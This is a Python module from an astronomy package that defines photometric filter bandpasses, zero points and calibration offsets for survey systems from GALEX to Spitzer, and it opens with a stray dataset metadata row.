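# Illustrative usage (not part of the original solution):
#   Solution().addStrings("456", "77")  # -> "533"
#   Solution().addStrings("99", "1")    # -> "100"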
| 36.5 | 117 | 0.531963 |
2a9dc97cf8f5358ac44d46150f0a9caf8501094e | 115,605 | py | Python | sdf/filter_info.py | drgmk/sdf | a44e66a82f876dda079686b32c767370276c38a1 | ["MIT"] | 1 | 2020-07-01T15:55:16.000Z | 2020-07-01T15:55:16.000Z | sdf/filter_info.py | drgmk/sdf | a44e66a82f876dda079686b32c767370276c38a1 | ["MIT"] | 4 | 2017-03-28T19:18:09.000Z | 2021-09-21T08:17:45.000Z | sdf/filter_info.py | drgmk/sdf | a44e66a82f876dda079686b32c767370276c38a1 | ["MIT"] | 1 | 2020-07-13T19:39:15.000Z | 2020-07-13T19:39:15.000Z |
"""Filter bandpassses, zero points, and offsets.
Overview
--------
Bandpasses
^^^^^^^^^^
Many bandpasses are from Mann & von Braun (2015, MvB,
2015PASP..127..102M), which sought a self-consistent set of bandpasses
and zero points, mainly for "heritage" photometric systems that include
observations of bright stars. These filters are all in units of energy,
so are integrated directly (also commonly called relative system
response, or RSRs).
Synthetic photometry
^^^^^^^^^^^^^^^^^^^^
The Spitzer colour correction tests pass in comparison with those on the
SSC pages, with precision of a few percent or better (worst for IRAC),
so the correction to the fluxes is different by a few 10^-4 and good
enough. The differences appear to be in the details of the interpolation
and integration, but exactly where isn't clear (e.g. np.trapz and
scipy.integrate.simps give the same results). Anyway, the success of
these tests suggests that the synthetic photometry works.
Absolute calibration
^^^^^^^^^^^^^^^^^^^^
To ensure a consistent absolute calibration all zero points are re-
derived using the CALSPEC Vega spectrum, as this has been used by many
authors to derive zero point magnitudes (i.e. the magnitude of Vega in a
given photometric system, also known as the zero point offset). In
converting magnitudes to flux densities these offsets are subtracted, so
a positive offset yields a brighter flux for a given magnitude.
Optical
~~~~~~~
In the optical (shortward of 1 micron) the absolute calibration finds
Vega to be slightly fainter than zero magnitude. Systems still use Vega
for their zero point, but include an offset, which is the magnitude of
Vega in each filter, and is 0.027 in Johnson V.
The zero points are derived from the CALSPEC Vega spectrum, and offsets
have been derived by various authors e.g. Maiz-Appelaniz (2006), Bessell
& Murphy (2012), Mann & von Braun (2015).
In MvB there are no zero point offsets, so the zero points can be used
to derive ZPOs relative to the CALSPEC Vega spectrum. Their zero points
tend to be larger numbers, meaning that the ZPO (i.e. Vega) is a more
positive magnitude.
In most cases the zero point offsets have been re-derived with a
minimisation process that attempts to reach a happy medium across all
filters.
Infrared
~~~~~~~~
In the IR zero magnitude is defined by Vega, but again small offsets may
be needed. The CALSPEC spectrum appears to have the same IR flux as the
one in Cohen et al 1992 (i.e. gives same fluxes for 2MASS in Cohen et al
2003 and IRAS in Cohen et al 1992). The Vega spectrum in the 1992 paper
underpins most IR photometric systems (apart from the one proposed by
Rieke et al 2008, which is ~2% brighter). Thus, zero point offsets in
the IR should be minimal. So while the K magnitude for Vega was found to
be -0.36 by Rieke et al 2008, the K magnitude of "Vega" used for
calibration purposes is zero by definition.
Filters
-------
This file contains all the information specific to all bandpasses in a
dictionary called filters. Each entry has the name used by that bandpass
(e.g. UJ for Johnson U), and is itself a dictionary containing the
necessary subset of infomration for filter.Filter.get to construct that
filter.
Most of the information comes from the Spanish VO filter service at
http://svo2.cab.inta-csic.es/theory/fps3/, but is supplemented by extra
information to avoid various errors (e.g. mainly if a given bandpass is
in photon or energy units, but sometimes zero points and always zero
point offsets). The specific treatment of a given filter depends on
provenance and use.
An additional list of "dummy" filters is given, containing i) generic
bandpasses centered on a specific wavelength, and ii) colours/indices
that are combinations of other filters. These contain little actual
information aside from the name, which uses the convention of an
underscore to form a colour (e.g. "UJ_BJ" is Johnson U-B). Practically
this is done using the filter.Colour object, which contains a list of
filters and weights for a given colour/index that says how to add the
magnitudes.
These are roughly in order of wavelength.
.. todo:: all to be updated when ZPOs are sorted
GALEX
Filters are from SVO, and are effective area so can be considered
photon counting. Catalogue supplies fluxes and magnitudes, so for now
the former is used and no zero point needed. As-yet no evidence that
this system is or isn't consistent with "Vega". Magnitude system is
AB. Generally don't include in fitting due to the possibility of a UV
excess.
Johnson
Filters are from MvB. Photometry in this system comes from Mermilliod
(UBV means), Bessell (UBV, also Cousins RI), Koen (UBV).
Stromgren
Filters are from Bessell 2011 (MvB exist), used because conversions
from that paper are also used. Using these corrections didn't make any
obvious differences.
Vega has non-zero magnitudes in this system (e.g. Gray 1998), and
measurements in this system are only in colours/indices so the
absolute calibration is not important.
Hipparcos/Tycho
Filters are from MvB. Photometry in this system comes from the
original Hipparcos catalogue, and the Tycho 2 catalogue. Tycho-2 is
taken to have the "correct" absolute calibration in deriving others.
Gaia
Filters are from SVO.
Cousins
Filters are from MvB. Photometry in this system comes from Bessell.
Haven't been able to find which system most Gliese (CNS3) RI photometry
is in, so not included.
Kepler
Filter from SVO. No photometry from this system used, so filter exists
to make predictions.
DDO
Filter from SVO, KPNO/Mosaic.D51 assumed to be similar to that used
for the survey of the Kepler field.
2MASS
Filters from Cohen (via SVO). Photometry from the 2MASS PSC, separated
into read1 (e.g. 2MR1H) and read2 (e.g. 2MR2H) after suggestion in
Rieke (2008) that there is a few percent offset for stars observed in
both modes. No evidence for this offset seen in SED fitting (yet).
This system is used as one of those with the "correct" absolute
calibration.
DENIS
Filters from Fouque et al 2000. Calibration assumes Vega is zero mag.
No zero point offsets.
Spitzer/IRAC
Filters from SSC (via SVO), need to be converted to energy. Photometry
is from SEIP. No zero point offsets used.
Spitzer/IRS PUI
Filters from SSC (via SVO), need to be converted to energy. No
photometry in this system currently used.
Spitzer/MIPS
Filters from SSC (via SVO), in photon units. Zero points derived from
"Vega", where "Vega" has been slightly rescaled (as returned by
spectrum.ObsSpectrum.vega()) to ensure 7.17Jy at 23.675um. Assume
70 micron calibration used in published papers good enough (i.e.
photometric uncertainties much larger than calibration uncertainty).
WISE
Filters from SVO in energy units. Photometry from ALLWISE. Zero point
offset needed for W3.
AKARI/IRC
Filters from SVO in energy units. Photometry from IRC PSC. Catalogue
has fluxes so zero points not needed. Calibration uses Cohen network
so should have similar offsets to IRAC. Looks to be a systematic
change in S18/S09 as a function of S18 (or S09) for stars in narrow
B-V range, which could be the cause of apparent warm excesses arising
from only S18 photometry.
MSX
Filters from SVO as RSRs. No photometry in this system currently
included.
LBTI/NOMIC
Filter from Denis Defrere, assumed QE-based so needs to be converted
to photon units. No photometry, used for predictions.
IRAS
Filters from SVO in energy units. Photometry from PSC and FSC. At 12
micron Rieke conclude that the fluxes need to be reduced by a factor
of 0.992, and by 0.98 at 25 micron. Original calibration used.
Herschel/PACS
Filters from SVO in energy units. Use fluxes as published or in GMK's
personal catalogue, assume calibration uncertainty much smaller than
photometric uncertainty.
Herschel/SPIRE
Filters from SVO in energy units. Use fluxes as published or in GMK's
personal catalogue, assume calibration uncertainty much smaller than
photometric uncertainty.
"""
import os
import glob
import numpy as np
import astropy.units as u
from . import utils
c_micron = u.micron.to(u.Hz,equivalencies=u.spectral())
filters = {}
# dummy filters for colours/indices or artificial bandpasses
# that we want in the "all" list
extras = ['BS_YS','STROMM1','STROMC1',
'UJ_BJ','BJ_VJ','VJ_IC','VJ_RC','RC_IC',
'WAV44','WAV63',
'WAV350','WAV450','WAV610',
'WAV800','WAV850','WAV855',
'WAV860','WAV870','WAV880','WAV890','WAV895',
'WAV1100',
'WAV1200','WAV1240','WAV1250','WAV1260','WAV1270','WAV1290',
'WAV1300','WAV1310','WAV1330','WAV1340','WAV1350',
'WAV2000','WAV2140','WAV2700',
'WAV3000','WAV3190','WAV3300',
'WAV6800',
'WAV8800',
'WAV9000']
for f in extras:
filters[f] = {
'magnitude_system': None,
'zero_point': None,
'zero_point_ref': None,
'ref_wavelength': None,
'ref_spectrum': None,
'response_type': None,
'response_ref': None,
'wav_micron': None,
'response': None
}
# many filters can come from SVO, but photon/energy and probably zero
# points suspect, so do manually here
# http://svo2.cab.inta-csic.es/theory/fps3/
# GALEX responses are effective area, so equivalent
# to photon counting. Need to get these in AB system
filters['GALFUV'] = {'svo_name': 'PhotCalID=GALEX/GALEX.FUV/AB',
'response_type': 'photon'}
filters['GALNUV'] = {'svo_name': 'PhotCalID=GALEX/GALEX.NUV/AB',
'response_type': 'photon'}
# SDSS, zpos untested
filters['USDSS'] = {'svo_name': 'SLOAN/SDSS.u',
'magnitude_system': 'AB',
'zero_point_offset': 0.04,
'response_type': 'energy'}
filters['GSDSS'] = {'svo_name': 'SLOAN/SDSS.g',
'magnitude_system': 'AB',
'zero_point_offset': 0.01,
'response_type': 'energy'}
filters['RSDSS'] = {'svo_name': 'SLOAN/SDSS.r',
'magnitude_system': 'AB',
'zero_point_offset': 0.01,
'response_type': 'energy'}
filters['ISDSS'] = {'svo_name': 'SLOAN/SDSS.i',
'magnitude_system': 'AB',
'zero_point_offset': 0.01,
'response_type': 'energy'}
filters['ZSDSS'] = {'svo_name': 'SLOAN/SDSS.z',
'magnitude_system': 'AB',
'zero_point_offset': 0.0,
'response_type': 'energy'}
# APASS the same filters as SDSS, slight changes in zero point offsets
filters['GAPASS'] = {'svo_name': 'SLOAN/SDSS.g',
'magnitude_system': 'AB',
'zero_point_offset': 0.005,
'response_type': 'energy'}
filters['RAPASS'] = {'svo_name': 'SLOAN/SDSS.r',
'magnitude_system': 'AB',
'zero_point_offset': 0.005,
'response_type': 'energy'}
filters['IAPASS'] = {'svo_name': 'SLOAN/SDSS.i',
'magnitude_system': 'AB',
'zero_point_offset': -0.01,
'response_type': 'energy'}
# zero point offsets from Bessell & Murphy 2012 are 0.04, 0.022, 0.027.
# from MvB are 0.0188, 0.0185, 0.027 (latter fixed to 0.027)
# consider Johnson V magnitude of Vega to be immutable at 0.027
filters['UJ'] = {'svo_name': 'GCPD/Johnson.U',
'zero_point_offset': -0.04,
'response_type': 'energy'}
filters['BJ'] = {'svo_name': 'GCPD/Johnson.B',
'zero_point_offset': 0.058,
'response_type': 'energy'}
filters['VJ'] = {'svo_name': 'GCPD/Johnson.V',
'zero_point_offset': 0.027,
'response_type': 'energy'}
# APASS, uses Landolt standards
filters['BL'] = {'svo_name': 'GCPD/Johnson.B_Landolt',
'zero_point_offset': 0.008,
'response_type': 'energy'}
filters['VL'] = {'svo_name': 'GCPD/Johnson.V_Landolt',
'zero_point_offset': 0.017,
'response_type': 'energy'}
filters['BAPASS'] = filters['BL']
filters['VAPASS'] = filters['VL']
# zero point offsets from Bessell & Murphy 2012 are 0.027, 0.028
# from MvB are 0.0212, 0.0091. Note that their R bandpasses look a bit
# different, so perhaps expect different ZPOs
filters['RC'] = {'svo_name': 'GCPD/Cousins.R',
'zero_point_offset': 0.047,
'response_type': 'energy'}
filters['IC'] = {'svo_name': 'GCPD/Cousins.I',
'zero_point_offset': 0.035,
'response_type': 'energy',
'zero_point': 2510.0} # wrong on SVO
# Stromgren (uvby) from Maiz-Appelaniz 2006 is 1.435, 0.182, 0.021,
# 0.014. Comparing Mann & von Braun and CALSPEC zero points gives 1.401,
# 0.175, 0.0256, 0.031. Gray 1998 gives 1.445, 0.195, 0.034, 0.03 and
# GCPD is almost exactly the same. Bessel gives coefficients to convert
# between observed and synthetic photometry, having assumed the GCPD
# zero points, which are a function of b-y, so needs to be implemented
# elsewhere (i.e. file read time)
filters['US'] = {#'svo_name': 'GCPD/Stromgren.u',
'magnitude_system': 'Vega',
'zero_point_offset': 1.435, #1.257,
'response_type': 'photon',
# Bessell 2011 responses, photon counting
'wav_micron': [0.3150, 0.3175, 0.3200, 0.3225, 0.3250,
0.3275, 0.3300, 0.3325, 0.3350, 0.3375, 0.3400, 0.3425, 0.3450, 0.3475,
0.3500, 0.3525, 0.3550, 0.3575, 0.3600, 0.3625, 0.3650, 0.3675, 0.3700,
0.3725, 0.3750, 0.3775, 0.3800, 0.3825, 0.3850],
'response': [0.000, 0.004, 0.050, 0.122, 0.219, 0.341,
0.479, 0.604, 0.710, 0.809, 0.886, 0.939, 0.976, 1.000, 0.995, 0.981,
0.943, 0.880, 0.782, 0.659, 0.525, 0.370, 0.246, 0.151, 0.071, 0.030,
0.014, 0.000, 0.000]
}
filters['VS'] = {#'svo_name': 'GCPD/Stromgren.v',
'magnitude_system': 'Vega',
'zero_point_offset': 0.182, #0.272,
'response_type': 'photon',
'wav_micron': [0.3750, 0.3775, 0.3800, 0.3825,
0.3850, 0.3875, 0.3900, 0.3925, 0.3950, 0.3975, 0.4000, 0.4025, 0.4050,
0.4075, 0.4100, 0.4125, 0.4150, 0.4175, 0.4200, 0.4225, 0.4250, 0.4275,
0.4300, 0.4325, 0.4350, 0.4375, 0.4400, 0.4425, 0.4450],
'response': [0.000, 0.003, 0.006, 0.016, 0.029, 0.044,
0.060, 0.096, 0.157, 0.262, 0.404, 0.605, 0.810, 0.958, 1.000, 0.973,
0.882, 0.755, 0.571, 0.366, 0.224, 0.134, 0.079, 0.053, 0.039, 0.027,
0.014, 0.006, 0.000]
}
filters['BS'] = {#'svo_name': 'GCPD/Stromgren.b',
'magnitude_system': 'Vega',
'zero_point_offset': 0.021, #0.055,
'response_type': 'photon',
'wav_micron': [0.4350, 0.4375, 0.4400, 0.4425, 0.4450,
0.4475, 0.4500, 0.4525, 0.4550, 0.4575, 0.4600, 0.4625, 0.4650, 0.4675,
0.4700, 0.4725, 0.4750, 0.4775, 0.4800, 0.4825, 0.4850, 0.4875, 0.4900,
0.4925, 0.4950, 0.4975, 0.5000, 0.5025, 0.5050],
'response': [0.000, 0.010, 0.023, 0.039, 0.056, 0.086,
0.118, 0.188, 0.287, 0.457, 0.681, 0.896, 0.998, 1.000, 0.942, 0.783,
0.558, 0.342, 0.211, 0.130, 0.072, 0.045, 0.027, 0.021, 0.015, 0.011,
0.007, 0.003, 0.000]
}
filters['YS'] = {#'svo_name': 'GCPD/Stromgren.y',
'magnitude_system': 'Vega',
'zero_point_offset': 0.014, #0.03,
'response_type': 'photon',
'wav_micron': [0.5150, 0.5175, 0.5200, 0.5225, 0.5250,
0.5275, 0.5300, 0.5325, 0.5350, 0.5375, 0.5400, 0.5425, 0.5450, 0.5475,
0.5500, 0.5525, 0.5550, 0.5575, 0.5600, 0.5625, 0.5650, 0.5675, 0.5700,
0.5725, 0.5750, 0.5775, 0.5800, 0.5825, 0.5850],
'response': [0.000, 0.022, 0.053, 0.082, 0.116, 0.194,
0.274, 0.393, 0.579, 0.782, 0.928, 0.985, 0.999, 1.000, 0.997, 0.938,
0.789, 0.574, 0.388, 0.232, 0.143, 0.090, 0.054, 0.031, 0.016, 0.010,
0.009, 0.004, 0.000]
}
# Skymapper
filters['SkyMapper.u'] = {'svo_name': 'SkyMapper/SkyMapper.u',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
filters['SkyMapper.v'] = {'svo_name': 'SkyMapper/SkyMapper.v',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
filters['SkyMapper.g'] = {'svo_name': 'SkyMapper/SkyMapper.g',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
filters['SkyMapper.r'] = {'svo_name': 'SkyMapper/SkyMapper.r',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
filters['SkyMapper.i'] = {'svo_name': 'SkyMapper/SkyMapper.i',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
filters['SkyMapper.z'] = {'svo_name': 'SkyMapper/SkyMapper.z',
'zero_point_offset': 0.0,
'magnitude_system': 'AB',
'response_type': 'energy'}
# zero point offsets from Bessell & Murphy 2012 (0.03, 0.023, 0.038)
# from MvB 0.0232, 0.0118, 0.0196
filters['BT'] = {'svo_name': 'TYCHO/TYCHO.B_MvB',
'zero_point_offset': 0.03,
'response_type': 'energy'}
filters['VT'] = {'svo_name': 'TYCHO/TYCHO.V_MvB',
'zero_point_offset': 0.023,
'response_type': 'energy'}
filters['HP'] = {'svo_name': 'Hipparcos/Hipparcos.Hp_MvB',
'zero_point_offset': 0.032,
'response_type': 'energy'}
# Gaia. Bandpasses appear to be photon counting according to Evans+2012,
# but are multiplied by lambda in SVO to convert to energy counting (their
# equation 2). DR2 assumes Vega has flux 3.66e-9 at 550nm, but CALSPEC
# spectrum has 3.54e-9, so DR2 magnitudes ~3% too bright
filters['GAIA.G'] = {'svo_name': 'GAIA/GAIA2r.G',
'zero_point_offset': 0.0,
'response_type': 'energy'}
filters['GAIA.BP'] = {'svo_name': 'GAIA/GAIA2r.Gbp',
'zero_point_offset': 0.0,
'response_type': 'energy'}
filters['GAIA.RP'] = {'svo_name': 'GAIA/GAIA2r.Grp',
'zero_point_offset': 0.0,
'response_type': 'energy'}
# Kepler, assume photon and same zero point offset as V (0.027)
filters['KP'] = {'svo_name': 'Kepler/Kepler.K',
'zero_point_offset': 0.027,
'response_type': 'photon'}
filters['D51'] = {'svo_name': 'KPNO/Mosaic.D51',
'zero_point_offset': 0.027,
'response_type': 'photon'}
# 2MASS, assume no difference between R1/R2 until evidence otherwise,
# zero point offsets from Cohen+2003 (who assume Vega=0)
filters['2MJ'] = {'svo_name': '2MASS/2MASS.J',
'zero_point_offset': -0.001 - 0.03,
'response_type': 'energy'}
filters['2MH'] = {'svo_name': '2MASS/2MASS.H',
'zero_point_offset': 0.019 + 0.005,
'response_type': 'energy'}
filters['2MKS'] = {'svo_name': '2MASS/2MASS.Ks',
'zero_point_offset': -0.017 + 0.01,
'response_type': 'energy'}
filters['2MR1J'] = filters['2MJ']
filters['2MR1H'] = filters['2MH']
filters['2MR1KS'] = filters['2MKS']
filters['2MR2J'] = filters['2MJ']
filters['2MR2H'] = filters['2MH']
filters['2MR2KS'] = filters['2MKS']
# DENIS, assume energy counting
filters['IDENIS'] = {'svo_name': 'DENIS/DENIS.I',
'zero_point_offset': 0.0,
'response_type': 'energy'}
filters['JDENIS'] = {'svo_name': 'DENIS/DENIS.J',
'zero_point_offset': -0.02,
'response_type': 'energy'}
filters['KSDENIS'] = {'svo_name': 'DENIS/DENIS.Ks',
'zero_point_offset': -0.01,
'response_type': 'energy'}
# WISE, RSRs already converted to energy, ref spectrum
# is F_nu oc 1/nu^2. residuals from seds suggest small changes
# in zero point offsets, perhaps because "Vega" is fainter than Vega
# Patel+2014 find Ks-W1=0.031, and give saturated calibrations for W1/2
# empirically find W3 needs to go up a bit
# 3.3% shift in W4 bandpass recommended by 2014PASA...31...49B
def w1_cal_func(x):
"""Calibration fit for W1 from Patel+2014."""
if x < 8.0:
return -0.1359+0.0396*x-0.0023*x**2
else:
return 0.0
def w2_cal_func(x):
"""Calibration fit for W2 from Patel+2014."""
if x < 5.3:
return 1.5777 - 0.3495 * x + 0.016 * x**2
elif 5.3 <= x < 6.7:
return -0.353 + 0.8826 * x - 0.238 * x**2 + 0.017 * x**3
else:
return 0.0
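# Illustrative: a saturated raw W2 magnitude of 4.0 is corrected to
# 4.0 + w2_cal_func(4.0) = 4.0 + (1.5777 - 1.398 + 0.256) ~ 4.436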
filters['WISE3P4'] = {'svo_name': 'WISE/WISE.W1',
'response_type': 'energy',
'zero_point_offset': -0.015,
'measurement_calibration': lambda x: x + w1_cal_func(x),
'ref_wavelength': 3.3526,
'ref_spectrum': lambda nu: 1.0/nu/nu}
filters['WISE4P6'] = {'svo_name': 'WISE/WISE.W2',
'response_type': 'energy',
'zero_point_offset': 0.01,
'measurement_calibration': lambda x: x + w2_cal_func(x),
'ref_wavelength': 4.6028,
'ref_spectrum': lambda nu: 1.0/nu/nu}
filters['WISE12'] = {'svo_name': 'WISE/WISE.W3',
'response_type': 'energy',
'zero_point_offset': 0.03,
'ref_wavelength': 11.5608,
'ref_spectrum': lambda nu: 1.0/nu/nu}
filters['WISE22'] = {'svo_name': 'WISE/WISE.W4',
'response_type': 'energy',
'zero_point_offset': 0.0,
'ref_wavelength': 22.0883,
'ref_spectrum': lambda nu: 1.0/nu/nu}
# (commented-out alternative W4 definition: 'magnitude_system': 'Vega' with
# tabulated wav_micron/response arrays spanning ~19.7-28.9 micron)
# AKARI: responses already converted to energy. Based on a flux-ratio
# plot against flux (where the factor 0.98 was already applied), add an
# 18um calibration conversion.
def s18_cal_func(x):
    """Calibration of the non-constant part, estimated by eye.

    Continuous at x=5, since (5/5)**0.02 == 1.
    """
    if x < 5.0:
        return (x/5)**0.02
    else:
        return 1.0
filters['AKARI9'] = {'svo_name': 'AKARI/IRC.S9W',
'response_type': 'energy',
'ref_wavelength': 9.0,
'ref_spectrum': lambda nu: 1.0/nu}
filters['AKARI18'] = {'svo_name': 'AKARI/IRC.L18W',
'response_type': 'energy',
'ref_wavelength': 18.0,
'measurement_calibration': lambda x: x*0.98*s18_cal_func(x),
'ref_spectrum': lambda nu: 1.0/nu}
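# Hedged illustration (not this module's API) of how the AKARI 18um
# 'measurement_calibration' above would be applied to a raw flux; the
# function name and the example flux value are hypothetical.
def _akari18_cal_example(raw_flux_jy=4.2):
    cal = filters['AKARI18'].get('measurement_calibration')
    # below 5 Jy this multiplies by 0.98*(raw/5)**0.02, above 5 Jy by 0.98
    return cal(raw_flux_jy) if cal is not None else raw_flux_jy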
# Spitzer: IRAC and IRS PUI are photon counting, MIPS is energy.
# IRAC/IRS ref spectrum is F_nu proportional to 1/nu; MIPS is a 10,000 K BB.
filters['IRAC3P6'] = {'svo_name': 'Spitzer/IRAC.I1',
'response_type': 'photon',
'ref_wavelength': 3.550,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAC4P5'] = {'svo_name': 'Spitzer/IRAC.I2',
'response_type': 'photon',
'ref_wavelength': 4.493,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAC5P8'] = {'svo_name': 'Spitzer/IRAC.I3',
'response_type': 'photon',
'ref_wavelength': 5.731,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRAC8'] = {'svo_name': 'Spitzer/IRAC.I4',
'response_type': 'photon',
'ref_wavelength': 7.872,
'ref_spectrum': lambda nu: 1.0/nu}
filters['IRSPUB'] = {
'magnitude_system': 'Vega',
'zero_point': 0.00000,
'zero_point_ref': 'bla',
'ref_wavelength': 15.8,
'ref_spectrum': lambda nu: 1.0/nu,
'response_type': 'photon',
'response_ref': 'http://irsa.ipac.caltech.edu/data/SPITZER/docs/\
dataanalysistools/cookbook/14/',
'wav_micron':[12.288, 12.317, 12.346, 12.376, 12.405, 12.435,
12.465, 12.495, 12.525, 12.555, 12.586, 12.616, 12.647, 12.678, 12.709,
12.741, 12.772, 12.803, 12.835, 12.867, 12.899, 12.931, 12.964, 12.996,
13.029, 13.061, 13.094, 13.128, 13.161, 13.194, 13.228, 13.262, 13.296,
13.330, 13.364, 13.399, 13.434, 13.469, 13.504, 13.539, 13.574, 13.610,
13.646, 13.682, 13.718, 13.754, 13.791, 13.828, 13.865, 13.902, 13.939,
13.977, 14.015, 14.052, 14.091, 14.129, 14.168, 14.207, 14.246, 14.285,
14.324, 14.364, 14.404, 14.444, 14.484, 14.525, 14.566, 14.607, 14.648,
14.689, 14.731, 14.773, 14.815, 14.858, 14.901, 14.943, 14.987, 15.030,
15.074, 15.118, 15.162, 15.206, 15.251, 15.296, 15.341, 15.387, 15.433,
15.479, 15.525, 15.572, 15.619, 15.666, 15.713, 15.761, 15.809, 15.857,
15.906, 15.955, 16.004, 16.054, 16.104, 16.154, 16.204, 16.255, 16.306,
16.358, 16.409, 16.462, 16.514, 16.567, 16.620, 16.673, 16.727, 16.781,
16.836, 16.890, 16.946, 17.001, 17.057, 17.114, 17.170, 17.227, 17.285,
17.342, 17.401, 17.459, 17.518, 17.578, 17.637, 17.698, 17.758, 17.819,
17.881, 17.942, 18.005, 18.067, 18.131, 18.194, 18.258, 18.323, 18.388,
18.453, 18.519, 18.586, 18.653, 18.720, 18.788, 18.856, 18.925, 18.994,
19.064, 19.134, 19.205, 19.277, 19.348, 19.421],
'response':[0.001, 0.002, 0.003, 0.002, 0.002, 0.002, 0.002, 0.001,
0.002, 0.002, 0.002, 0.004, 0.006, 0.009, 0.011, 0.013, 0.018, 0.026,
0.038, 0.060, 0.077, 0.093, 0.107, 0.132, 0.171, 0.219, 0.290, 0.355,
0.432, 0.503, 0.578, 0.639, 0.676, 0.706, 0.723, 0.720, 0.709, 0.723,
0.736, 0.764, 0.791, 0.861, 0.909, 0.939, 0.946, 0.963, 0.936, 0.932,
0.936, 0.949, 0.953, 0.963, 0.963, 0.959, 0.953, 0.943, 0.929, 0.929,
0.929, 0.936, 0.936, 0.939, 0.949, 0.953, 0.939, 0.949, 0.959, 0.970,
0.976, 0.990, 1.000, 0.993, 0.993, 0.983, 0.966, 0.936, 0.916, 0.895,
0.882, 0.865, 0.845, 0.828, 0.807, 0.794, 0.784, 0.770, 0.764, 0.760,
0.767, 0.797, 0.828, 0.848, 0.872, 0.902, 0.902, 0.892, 0.882, 0.875,
0.858, 0.841, 0.831, 0.814, 0.797, 0.784, 0.774, 0.770, 0.777, 0.784,
0.787, 0.787, 0.791, 0.791, 0.791, 0.784, 0.774, 0.770, 0.767, 0.764,
0.770, 0.787, 0.794, 0.780, 0.794, 0.818, 0.821, 0.841, 0.845, 0.845,
0.841, 0.804, 0.770, 0.757, 0.750, 0.753, 0.747, 0.736, 0.740, 0.757,
0.747, 0.740, 0.760, 0.747, 0.703, 0.635, 0.530, 0.399, 0.271, 0.169,
0.095, 0.056, 0.033, 0.020, 0.013, 0.009, 0.005, 0.002]}
filters['IRSPUR'] = {
'magnitude_system': 'Vega',
'zero_point': 0.00000,
'zero_point_ref': 'bla',
'ref_wavelength': 22.3,
'ref_spectrum': lambda nu: 1.0/nu,
'response_type': 'photon',
'response_ref': 'http://irsa.ipac.caltech.edu/data/SPITZER/docs/\
dataanalysistools/cookbook/14/',
'wav_micron':[17.170, 17.227, 17.285, 17.342, 17.401, 17.459,
17.518, 17.578, 17.637, 17.698, 17.758, 17.819, 17.881, 17.942, 18.005,
18.067, 18.131, 18.194, 18.258, 18.323, 18.388, 18.453, 18.519, 18.586,
18.653, 18.720, 18.788, 18.856, 18.925, 18.994, 19.064, 19.134, 19.205,
19.277, 19.348, 19.421, 19.494, 19.567, 19.642, 19.716, 19.792, 19.867,
19.944, 20.021, 20.098, 20.177, 20.255, 20.335, 20.415, 20.496, 20.577,
20.659, 20.742, 20.825, 20.909, 20.993, 21.079, 21.165, 21.252, 21.339,
21.427, 21.516, 21.606, 21.696, 21.787, 21.879, 21.972, 22.066, 22.160,
22.255, 22.351, 22.448, 22.545, 22.644, 22.743, 22.843, 22.944, 23.046,
23.149, 23.253, 23.358, 23.463, 23.570, 23.677, 23.786, 23.896, 24.006,
24.118, 24.231, 24.344, 24.459, 24.575, 24.692, 24.810, 24.930, 25.050,
25.172, 25.295, 25.419, 25.544, 25.670, 25.798, 25.927, 26.057, 26.189,
26.322, 26.456, 26.592, 26.729, 26.867, 27.007, 27.149, 27.292, 27.436,
27.582, 27.729, 27.878, 28.029, 28.181, 28.335, 28.491, 28.649, 28.808,
28.969, 29.131, 29.296, 29.462, 29.631, 29.801, 29.973, 30.147, 30.324,
30.502, 30.683, 30.865, 31.050, 31.237, 31.427, 31.618, 31.812, 32.008,
32.207, 32.409, 32.612, 32.819, 33.028, 33.240, 33.454, 33.671, 33.891,
34.114, 34.340, 34.569, 34.801, 35.036],
'response':[ 0.001, 0.000, 0.002, 0.003, 0.004, 0.007, 0.003, 0.004,
0.006, 0.005, 0.001, 0.006, 0.003, 0.005, 0.008, 0.015, 0.025, 0.040,
0.059, 0.094, 0.149, 0.238, 0.351, 0.500, 0.651, 0.780, 0.862, 0.931,
0.954, 0.986, 1.000, 0.959, 0.913, 0.904, 0.940, 0.950, 0.945, 0.959,
1.000, 0.991, 0.995, 0.972, 0.986, 0.954, 0.945, 0.931, 0.922, 0.913,
0.908, 0.899, 0.885, 0.872, 0.858, 0.849, 0.849, 0.853, 0.862, 0.881,
0.894, 0.904, 0.913, 0.922, 0.922, 0.922, 0.917, 0.913, 0.904, 0.899,
0.890, 0.881, 0.862, 0.844, 0.830, 0.821, 0.812, 0.812, 0.817, 0.817,
0.803, 0.789, 0.771, 0.748, 0.729, 0.725, 0.739, 0.761, 0.784, 0.803,
0.817, 0.817, 0.798, 0.789, 0.766, 0.748, 0.725, 0.706, 0.679, 0.651,
0.619, 0.592, 0.555, 0.523, 0.491, 0.459, 0.430, 0.398, 0.378, 0.356,
0.336, 0.318, 0.304, 0.284, 0.266, 0.247, 0.226, 0.204, 0.185, 0.167,
0.154, 0.137, 0.124, 0.109, 0.098, 0.084, 0.077, 0.068, 0.061, 0.053,
0.046, 0.039, 0.032, 0.026, 0.020, 0.013, 0.008, 0.005, 0.004, 0.003,
0.002, 0.002, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001, 0.000, 0.000,
0.000, 0.000, 0.000, 0.000, 0.000,-0.000,-0.000]}
filters['MIPS24'] = {'svo_name': 'Spitzer/MIPS.24mu',
'response_type': 'energy',
'ref_wavelength': 23.675,
'ref_spectrum': lambda nu: utils.bnu_nu_hz(nu,10000.0)}
filters['MIPS70'] = {'svo_name': 'Spitzer/MIPS.70mu',
'response_type': 'energy',
'ref_wavelength': 71.42,
'ref_spectrum': lambda nu: utils.bnu_nu_hz(nu,10000.0)}
filters['MIPS160'] = {'svo_name': 'Spitzer/MIPS.160mu',
'response_type': 'energy',
'ref_wavelength': 155.9,
'ref_spectrum': lambda nu: utils.bnu_nu_hz(nu,10000.0)}
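# For reference, a self-contained Planck-function sketch consistent with the
# 10,000 K blackbody reference spectra above. This is an assumption about
# what utils.bnu_nu_hz computes; its units and normalisation may differ.
def _bnu_nu_hz_sketch(nu, temp):
    """B_nu(nu [Hz], temp [K]) in W m^-2 Hz^-1 sr^-1 (sketch only)."""
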